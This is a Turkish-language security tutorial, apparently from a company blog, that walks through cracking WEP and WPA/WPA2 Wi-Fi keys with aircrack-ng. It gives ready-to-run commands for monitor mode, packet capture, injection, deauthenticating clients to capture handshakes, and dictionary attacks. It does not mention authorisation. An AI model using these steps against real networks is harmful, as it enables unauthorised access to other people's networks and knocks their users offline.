Wireless Cracking Secrove Bilgi Güvenliği
, WPA, WPA2 Wireless koruma yöntemlerine (WEP, WPA, WPA2) karşı geliştirilen saldırı yöntemleridir. Wordlist kullanılarak yapılan BruteForce saldırısı ile parola kırılmaktadır.
Kırılması diğer WPA, WPA2'ye göre daha kolaydır. Kırma işlemi sırasında parolasını kırmak istediğimiz access point'in trafiğini capture etmemiz gerekmektedir. Trafik capture edilirken, access point'e auth paketi iletip paket enjecte edilir. Bu sayede, parola kırmak için kullanılan Initialization Vector (IV) bilgisi de capture edilir. Bu noktaya kadar capture edilen paketler'e karşı BruteForce saldırısı başlatılır.
İlk olarak wireless interface monitor moda alınmalıdır. Bu sayede oluşan monitor interface üzerinden paketler yakalanacak ve paket injection gerçekleştirilecektir. #> airmon-ng start wlan0
Ikinci adımda, wireless access pointler listelenir. Burada access pointlerin encryption metodları gorulmektedir. WEP olan hedef belirlenir. BSSID (MAC adresi) daha sonra kullanılacaktır. Ayrıca access point'in CHANNEL bilgisi kullanılacaktır. #> airodump-ng mon0
Hedef access point'in bssid'si ve channel bilgisi kullanılarak trafik capture edilerek dosyaya kaydedilecektir. Bu işlem için mon0 interface'i kullanılacaktır. Ekranda da, ilgili access point'ten capture edilen paket bilgileri gosterilmektedir. #> airodump-ng -c 6 --bssid 00:18:4D:FA:33:44 -w WepCapture mon0
Capture sirasinda, diger yandan authentication request gondermek gerekmektedir. Hedef accesspoint'e auth request gonderilecektir. #> aireplay-ng -1 0 -a 00:18:4D:FA:33:44 mon0 airodump-ng ekraninda access point'te AUTH kismin OPN olarak gorulur. Artik paketler gonderilmeye baslanir.
Artık access point'e paketler gonderilir ve beklenir. airodump-ng ekranında paket artisi gorulecektir. #> aireplay-ng -3 -b 00:18:4D:FA:33:44 mon0 Bu adımdan sonra aircrack-ng yardımıyla, paket capture edip kaydedilen dosya üzerinden crack işlemi gerçekleştirilir.
Crack işlemi için aircrack-ng komutu kullanılacaktır. #> aircrack-ng WepCapture-01.cap KEY FOUND! ifadesi ile crackleme işlemi tamamlanir.
WPA Trafik capture edilinceye kadar yapılan işlemler WEP ile aynıdır. Trafik capture etmeye başladıktan sonra, WAP secured access point için deauth paketi gönderilmesi gerekmektedir. Trafik capture edilirken, access point'e bağlı olan istemcilerden bir tanesinin bağlantısı spoof edilmiş paket enjecte edilerek kopartılır ve istemcinin yeniden bağlanması beklenir. Bu sayede, parola kırmak için kullanılan Handshake bilgisi de capture edilir.
WPA Hedef access point'e deauth paketi gonderilecektir. Bu sayede istemcilerin tekrar hanshake yapmalari saglanir. Handshake yapildigi zaman WPA cracklenebilir. #> aireplay-ng -0 1 -a 00:18:4D:FA:33:44 -c 00:0F:B5:FD:FB:C2 mon0
WPA Deauth paket injection'ı yapılırken, capture içerisinde handshake olup olmadığı kontrol edilecektir. #> aircrack-ng WpaCature-01.cap Handshake var ise, bu capture kullanılarak BruteForce yapılabilecektir.
WPA Handshake var ise, bu capture kullanılarak BruteForce yapılabilecektir. #> aircrack-ng WpaCature-01.cap -b 00:18:4D:FA:33:44 -w DictionaryFile Bu komutla handshake paketi olan captured trafige dictionary atak baslayacaktir. KEY FOUND ifadesi ile WPA key gosterilecektir.